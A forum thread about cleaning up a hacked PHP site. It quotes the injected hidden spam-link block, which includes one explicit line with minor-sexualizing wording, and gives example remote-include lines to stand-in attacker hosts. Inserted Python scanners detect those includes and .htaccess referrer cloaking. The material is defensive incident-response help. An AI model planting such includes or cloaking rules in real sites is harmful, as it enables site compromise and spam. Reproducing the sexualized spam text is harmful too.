  1. #1
    SitePoint Enthusiast yomimedia's Avatar
    Join Date
    May 2007
    Posts
    68

    Can't find virus like script in php code. Need help!

    Hey Guys,

    My client's site was hacked a few days ago and I found a lot of spam in the php code. I pasted it below. I tried looking for this spam content in a lot of the php pages of the site and can't find it. I even searched the database and couldn't come up with anything. Is there somewhere else I should be looking? This spam content comes up in almost all of the pages of the website. Do you guys have any suggestions of where else to look? You can do a view source on one of the pages to get some ideas ( http://www.pasofinopro.com/lessons/workshops.php ). Let me know what you guys think.

    Thanks!!



    <body ><div style="display:none"><!--438305940--><p>A disadvantage is split-dollar life <a href="http://www.cycnorth.com/gallery/displayimage.php/?info-id=15">we finance com</a> arrangements who attempt to. <!--193246651--><p>Amount that could be borrowed against the same net <a href="http://www.inlapaz.com/weather2/hw3.php/?id-advise=190">register your credit card</a> flows! <!--627267622--><p>Private Label Products Into Cash-Generating Assets That Make <a href="http://www.institutolibertad.org/galeria/displayimage.php/?advise=184">bank soal unas</a> For YOU At Will! <!--373769585--><p>Money transfer and <a href="http://savannahoutenaustralia.com/gallery/?easy=162">antbuster v1 2 money</a> eachange for the UK, Iran and other countries. <!--172319278--><p>insurance since it can be written to match the amortization of your <a href="http://universalgalaxies.com/surfaceburst/the-hottest-sci-fi-babes-of-star-trek-tos/comment-page-1/?easy=11">enhanced title insurance</a> principal. <!--768961712--><p>Uk casino welcome bonus no deposit, online casino coupons, casino free sign up bonus start no deposit, all casino bonus codes, casinos that give free <a href="http://www.sergisabate.cat/?take=75">china retirement fund</a> with no deposits. <!--31452282--><p>Use "effective" calculation for counting values when your <a href="http://wildbze.com/wildbzec/thumbnails.php/?about-pharm=175">budget planner to</a> ISN'T deposited in bank. <!--472796330--><p>Cash management - Size and satisfaction mark a great divide - Euromoney's annual <a href="http://www.hauntcon.com/index.php/?free=19">i ve got money in my pocket</a> management poll produced some unusual findings this year. 
<!--632954606--><p>Based on continued economic growth and comforted by a solid order book, despite the volatility of markets, the Group believes in the continuation of a resilient commercial aircraft <a href="http://www.stnicholas-oxford.org/content/supporting_the_parish/?pill=104">tyra banks video</a> and Airbus deliveries peaking in 2011-2012. <!--572189933--><p>No endorsement of any third-party products or <a href="http://s-promotion.de/coppermine/displayimage.php/?page-id=196">debt consolidation company in florida</a> is expressed or implied by any information, material or content referred to or included on, or linked from or to this web site. <!--577414231--><p>State Treasurer/State Controller Approved Exceptions To Daily Deposit Of State <a href="http://www.cbuao.com/coppermine/thumbnails.php/?info-id=193">find government funding</a> Under The Authority Of G. <!--638819953--><p>You guarantee us you are financially responsible for the payment of <a href="http://www.mercator-college.org/pics/thumbnails.php/?show-info=132">rome credit risk</a> contracted through us. <!--830438803--><p>AUSTIN - Commissioner of Education Jim Nelson announced today that 790 Texas public schools will receive about million in <a href="http://www.artofthis.net/gallery/displayimage.php/?show-drug=84">ge credit finance</a> awards for significant improvement on the Texas Assessment of Academic Skills test. <!--255347024--><p>But a mix of economic news reminded investors of the continuing fallout from the housing and <a href="http://www.loneparents.org/modules.php/?show-item=41">financial institutions south africa</a> crisis. <!--593215681--><p>If you pay only part of the cost of a business purchase in a tax period and have a valid tax invoice, you claim only the GST <a href="http://www.dezwei.at/robots.txt/?id-advise=45">cd simonian insurance</a> for that part of the cost in that tax period. 
<!--923106591--><p>Or, if you're ready, select the country you are sending <a href="http://www.doomsdayproductions.com/testing/displayimage.php?info-about=50">insurance big rapids michigan</a> from now at right. <!--546216522--><p>The third copy is intended for the Accommodation <a href="http://gmteam.com.ar/p/cpg/displayimage.php/?page-about=172">spanked for cash</a> of the Katholieke Hogeschool Kempen. <!--281434811--><p>Times article spurs <a href="http://www.mabcr.org/mabcrstore.php/?help=121">mutual first credit union omaha ne</a> surge for John McCain presidential campaign. <!--772813906--><p>July 14, 2006 its bonus day - <a href="http://www.cantabriatropical.com/galeria/addfav.php/?solution=112">serus credit union</a> for each sign-up on ManiacPass Sites! <!--41235373--><p>upon notification from the central securities depository advising that the returned securities have been successfully transferred by book-entry, the TSEC will pay the lender the securities lending fee out of the collateral to be returned, through the securities firm of the lender, and refund to the borrowing securities firm the <a href="http://www.natalia-livingston.com/photos/displayimage.php/?fda-about=187">direct deposit for va benefits</a> of the collateral remaining after deduction of the securities lending fee, or notify it to withdraw the non-cash collateral. <!--521938908--><p>ObtainingT aT <a href="http://www.oldcomputercollection.com/floppysleeves/?info-id=45">bankowy 3 5</a> from Aizkraukles Banka isT very easy. <!--276710792--><p>can be used to locate participating EBT retailers and <a href="http://www.newenglandphotographers.net/gallery/thumbnails.php/?best=180">irs payment method</a> devices. <!--991755096--><p>More and more consumers are feeling comfortable paying for purchases online using <a href="http://www.sbfhc.org/media/login.php/?ixym=27">trip insurance in</a> cards," Tan says. 
<!--38060997--><p>Design, installation, warranty and post-warranty <a href="http://www.primafoto.de/index.php/?help-page=149">lancashire butter pie recipe</a> of refrigerating equipment for technological processes. <!--621387925--><p>For budgets and <a href="http://www.fivecrowstudios.com/dominican/displayimage.php/?get-item=34">credit bureau services</a> flow forecasts, and rolling revised forecasts. <!--644836902--><p>Cash <a href="http://www.divesardegna.com/gallery/thumbnails.php/?free=143">xbox live account suspended payment</a> verified by me today and found to be rupees (in figures), rupees (in words). <!--540899903--><p>as at the end of the <a href="http://www.m-asa.org/gallery/displayimage.php/?show_page=13">ocean financial center</a> period and of the results for the period. <!--890553132--><p>The subject matter of the iconographic documents of the collection of the National <a href="http://baja-sportfishing.com/gallery/index.php/?info-about=145">dei titoli di credito</a> falls into two categories. <!--707297262--><p>If you are a person who has already approached a conventional <a href="http://5starbabes.net/?advise-id=83">assured credit counseling</a> with a request for a payday advance, you know this is the best offer you can get. <!--476769476--><p>Once implementation has been completed, Syrian Air will have a strong <a href="http://www.sevdalinke.com/bastina.php/?easy=97">information technology investment</a> foundation from which they can take their business to greater heights. <!--196559743--><p>s two founders owned 17% of the company, a group led by the EBRD held another 43% and <a href="http://christinariccifan.net/photos/displayimage.php/?get-item=60">tax money returns</a> Austria-Creditanstalt held 40 percent on behalf of institutional investors. <!--792630306--><p>said Mari Adam of Adam <a href="http://j-depp.net/gallery/displayimage.php/?advise=139">exchange traded fund australia</a> in Boca Raton, Fla. 
<!--476041864--><p>Torrent Young Teen stripper does a little dance and sucks **** for <a href="http://www.pasofinopro.com/studio/socials.php/?solution=50">principal financial grop</a> gets cum in her mouth and on her chin great puffie tits sexy lolita xxx sex porno is available for download in the XXX Adult category of our bit torrents web site. <!--499217075--><p>All documents available are listed, described and labelled according to the corresponding chapter of the <a href="http://www.keystonegroup.co.uk/gallery/displayimage.php/?easy=68">first merchandisers inc</a> Workbook to which they are related. <!--503489305--><p>FHA qualifying is very flexible and is not based as heavily on <a href="http://www.rahelbellinga.nl/gallery/thumbnails.php/?item-id=19">eaglemark savings bank customer</a> scores. <!--849527040--><p>Say yes to the convenience of a GE <a href="http://trulyvictorian.netfirms.com/gallery/forgot_passwd.php/?help-page=15">e loan calculator</a> MasterCard. <!--52333099--><p>No, they wanted that <a href="http://www.mackey-insurance.com/careers.php/?item-id=33">smith street funday</a> and the right to cut the strings that went along with it. <!--653902969--><p>Aims to provide regular income and consistent returns above the UBS Australian <a href="http://www.aimotion.org/photos/displayimage.php/?get-id=1">anti money laundering and terrorist financing</a> Bill Index over rolling three year periods (before fees) by investing in a diversified range of income generating assets. <!--309992480--><p>I'm looking to my ATPL next year but need to take a <a href="http://www.myccr.com/press/articles/article.php?page-info=150">accounting ii spiceland</a> out for it. <!--512020131--><p>What was left was only the best oppertunity for making real <a href="http://www.jensenconnection.com/gallery/v/todd_001/wedding/128_123.jpg.html?get-info=199">bank hebron kentucky</a> monthly with some effort on your part you'll find to date. 
<!--995138352--><p>The borrower pays the <a href="http://www.wurzer-graz.com/spd/coppermine/index.php/?best=103">online water bill payment</a> amount back on a fixed date and pays a fee to the lender, and the lender loans the borrower money. <!--201979279--><p>Isn't it on your <a href="http://www.milohistorical.org/photos/displayimage.php?help-about=30">katona jozsef bank</a> in a week, then try a friend of you too. <!--652724207--><p>The payment will be made either from personal grant or in <a href="http://www.ifkmunkfors.se/au_foto/index.php/?show-page=107">find monthly mortgage payment</a> on receipt. <!--956321073--><p>Marketing and Advertising Receive your <a href="http://voile.omonville.free.fr/cpg1413/index.php/?get-item=4">fundoscopic exam sharp</a> $ 100. <!--16706829--><p>Receding water levels in the drain led to the grim discovery of her badly decomposed body by a local man on his way to <a href="http://www.jf-gummersbach.de/gallerie/?solution=14">cashmere mafia air date</a> his turf on the near by bog. <!--613116028--><p>The <a href="http://www.spreadthedirt.com/photos/thumbnails.php/?get-item=193">international accounting standerds</a> of the deals in BGN denominated 3M issues was 1. <!--815795665-->So <u><a href="http://christieandmatt.com/?get-drug=60">commercial association of realtors</a></u> for a appellant, if you fissiparity, that you hydrodynamic to put unreservedly a lerner epoch that was numerically planned of the nerthus heartbreaking.<!--318471062-->We <u><a href="http://fevronia.com/displayimage.php/?qgox=7">london school of economics health</a></u> that nationwide are adrift vangueria to omiya that are tungusic the obtention of new rotavirus for nocturne substratum. </div>

  2. #2
    SitePoint Enthusiast
    Join Date
    Sep 2006
    Posts
    56
    1. This HTML appears on almost any page on the site. --
    The malicious stuff is triggered by something in commonly executed code. That should eliminate some of the code you have to crawl over. [Edit: template code perchance?]

    2. The spam content hidden in the page cannot seem to be found in your files. --
    The spam content is probably pulled from somewhere else. If you have any piece of code capable of retrieving off-site content look into that. Especially: if your PHP installation has allow_url_include set to true, pay very close attention to any include/require statements that use variables. A malicious person can hide a URL in a variable and then fetch and execute remote code at another point with an innocuous looking include statement.

  3. #3
    SitePoint Enthusiast yomimedia's Avatar
    Join Date
    May 2007
    Posts
    68
    So you think the only way to remove it is by removing and redoing those pages that have the allow_url_include? I know nothing about php. Clueless but if given good direction could figure it out somehow.

  4. #4
    SitePoint Enthusiast
    Join Date
    Sep 2006
    Posts
    56
    Not necessarily. allow_url_include is a PHP configuration setting. Basically, it allows you to include files by specifying a URL.

    The reason I mention it is that it's one, often overlooked, way an attacker can take code and content from their site and place it on yours. include 'http://badguys.com/badstuff.hdf'; for instance. It's also possible that they are pulling it through other means as well: file_get_contents, fopen, etc.

    Step through your code and pay close attention to anything that could possibly pull content from a remote site. Something like file_get_contents('http://badstuff.com/'); or an include $var; that you don't remember writing. (I'm assuming you wrote the code for this site yourself.)

    Once you find the offending code, you'll need to track down how it got there in the first place though.
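Replies #2 and #4 describe the constructs to look for: include/require driven by a variable, include/require of a URL, remote fetches through file_get_contents or fopen, and the allow_url_include setting that makes URL includes possible in the first place. The script below is an added example, not code from the thread or from the site in question; it runs the same checks over a constructed PHP snippet and a constructed php.ini excerpt that imitate those patterns (the hostnames ending in .example are placeholders). It also flags the `display:none` wrapper with a numeric HTML comment that the injected markup in post #1 uses, so a hit on that rule in your own files points at the spot where the spam is emitted.

```python
import re

# Constructed PHP sample, modelled on the patterns named in the replies.
# Hostnames ending in .example are placeholders, not real sites.
SAMPLE_PHP = """<?php
require_once 'lib/config.php';
include 'templates/header.php';
include $page;
require_once($_GET['tpl'] . '.php');
include 'http://badguys.example/badstuff.txt';
$html = file_get_contents('http://badstuff.example/');
$fh = fopen("http://badstuff.example/feed", "r");
$local = file_get_contents(__DIR__ . '/data/cache.txt');
echo "<div style=\\"display:none\\"><!--438305940-->...</div>";
"""

# Constructed php.ini excerpt with the risky settings switched on.
INI_SAMPLE = """; php.ini excerpt (constructed)
allow_url_fopen = On
allow_url_include = On
display_errors = Off
"""

# Each rule is (name, regex). A line is reported once per rule it matches.
SINK_RULES = [
    ("include-of-variable", re.compile(r"\b(include|require)(_once)?\s*\(?\s*\$")),
    ("include-of-url",      re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"](https?|ftp|php|data)://", re.I)),
    ("remote-fetch",        re.compile(r"\b(file_get_contents|fopen|curl_init)\s*\(\s*['\"](https?|ftp)://", re.I)),
    ("hidden-div-marker",   re.compile(r"display:\s*none.*<!--\d{5,}-->", re.I)),
]

def scan_php(source: str):
    """Return (line number, rule name, stripped line) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx in SINK_RULES:
            if rx.search(line):
                findings.append((lineno, name, line.strip()))
    return findings

def risky_ini_settings(ini_text: str):
    """Map of allow_url_include / allow_url_fopen to their value when enabled."""
    risky = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop comments
        if "=" not in line:
            continue
        key, _, val = line.partition("=")
        key, val = key.strip(), val.strip().lower()
        if key in ("allow_url_include", "allow_url_fopen") and val in ("on", "1", "true"):
            risky[key] = val
    return risky

if __name__ == "__main__":
    for lineno, rule, text in scan_php(SAMPLE_PHP):
        print(f"line {lineno:>3}  {rule:<22} {text}")
    print("risky ini settings:", risky_ini_settings(INI_SAMPLE))
```

To run it over a real site, replace SAMPLE_PHP with the contents of each .php file (walking the document root) and INI_SAMPLE with the output of `php --ini` or a phpinfo() dump. Every `include-of-variable` hit deserves a look even when it turns out to be legitimate, because that is exactly the statement a remote include hides behind; the `remote-fetch` hits tell you where off-site content enters the page.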

  5. #5
    SitePoint Wizard lorenw's Avatar
    Join Date
    Feb 2005
    Location
    was rainy Oregon now sunny Florida
    Posts
    1,094
    Also look for a .htaccess file, you may have to enable server side filtering, use -a

    Also look for any unusual files on your server.

    I had something similar a while back. If you went directly to the website you would see the regular website but if you came in from google you would see nothing but spam and all kinds of links to everywhere.

    It all began with the .htaccess file.
    What I lack in acuracy I make up for in misteaks
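lorenw's post points at two more places to check: a .htaccess file that treats search-engine visitors differently from direct visitors, and hidden (dot-prefixed) files that a plain directory listing does not show. The script below is an added example, not code from the thread; it audits a constructed .htaccess sample (the redirect target and the /tmp path are placeholders) for a RewriteCond on HTTP_REFERER naming a search engine followed by a RewriteRule, which is the cloaking lorenw describes, and it also flags `php_value auto_prepend_file` / `auto_append_file` lines, a directive the thread does not itself name but which likewise makes content appear on every page without touching the site's own files. The second function screens a constructed file listing for dot-prefixed entries other than .htaccess and .htpasswd.

```python
import re

# Constructed .htaccess modelled on referrer-based cloaking: search-engine
# visitors are redirected to a spam page, direct visitors see the real site.
# spam-host.example and /tmp/.cache/x.php are placeholders.
HTACCESS_SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn)\\. [NC]
RewriteRule ^(.*)$ http://spam-host.example/landing.php [R=302,L]
RewriteRule ^lessons/(.*)$ lessons.php?name=$1 [L]
php_value auto_prepend_file /tmp/.cache/x.php
"""

SEARCH_ENGINE_RX = re.compile(r"HTTP_REFERER.*(google|yahoo|bing|msn)", re.I)
PREPEND_RX = re.compile(r"^php_(value|admin_value)\s+auto_(prepend|append)_file\b", re.I)

def audit_htaccess(text: str):
    """Return (line number, finding, line) for cloaking rules and prepend/append directives."""
    findings = []
    pending_cond = None  # line of the last search-engine referrer condition not yet consumed
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        lowered = line.lower()
        if lowered.startswith("rewritecond"):
            if SEARCH_ENGINE_RX.search(line):
                pending_cond = lineno
            continue  # conditions accumulate until the next RewriteRule
        if lowered.startswith("rewriterule"):
            if pending_cond is not None:
                findings.append((lineno, "referrer-cloaking-redirect", line))
            pending_cond = None  # a RewriteRule consumes the conditions before it
            continue
        if PREPEND_RX.match(line):
            findings.append((lineno, "auto-prepend-append-file", line))
    return findings

KNOWN_DOTFILES = {".htaccess", ".htpasswd"}

def unusual_hidden_entries(paths):
    """Paths with a dot-prefixed component that is not a well-known Apache file."""
    hits = []
    for path in paths:
        parts = [p for p in path.split("/") if p]
        if any(p.startswith(".") and p not in KNOWN_DOTFILES for p in parts):
            hits.append(path)
    return hits

# Constructed listing, as `find . -type f` might print it.
SAMPLE_LISTING = [
    "lessons/workshops.php",
    ".htaccess",
    "images/.cache/x.php",
    "gallery/.s.php",
    ".htpasswd",
]

if __name__ == "__main__":
    for lineno, finding, line in audit_htaccess(HTACCESS_SAMPLE):
        print(f"line {lineno}: {finding}: {line}")
    print("hidden entries to inspect:", unusual_hidden_entries(SAMPLE_LISTING))
```

On a real server feed audit_htaccess the text of every .htaccess under the document root (there may be more than one) and unusual_hidden_entries the output of `find . -type f`, which, unlike `ls` without -a, lists dot-prefixed names.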

